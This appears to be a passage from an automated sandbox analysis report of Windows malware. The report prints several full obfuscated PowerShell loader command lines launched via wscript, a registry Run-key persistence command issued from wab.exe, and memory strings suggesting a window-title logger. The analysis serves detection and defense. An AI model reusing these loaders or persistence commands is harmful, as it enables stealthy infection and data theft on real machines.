depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beei
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "vibeka" /t reg_expand_sz /d "%pneumatorrhachis% -w 1 $salpeterholdiges=(get-itemproperty -path 'hkcu:\quicker\').savvy;%pneumatorrhachis% ($salpeterholdiges)"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jet
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beei Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beei Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "vibeka" /t reg_expand_sz /d "%pneumatorrhachis% -w 1 $salpeterholdiges=(get-itemproperty -path 'hkcu:\quicker\').savvy;%pneumatorrhachis% ($salpeterholdiges)" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jet Jump to behavior
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: wab.exe, 00000008.00000002.3295624818.00000000064A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/30 02:26:47 Program Manager]
Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: wab.exe, 00000008.00000003.2537135847.00000000064A5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/26 07:40:44 Program Manager]
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerONS
Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: wab.exe, 00000008.00000003.2537070704.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295900301.00000000064FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/26 09:11:46 Program Manager]
Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/26 07:41:23 Program Manager]
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2933 cpuid 8_2_222E2933
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
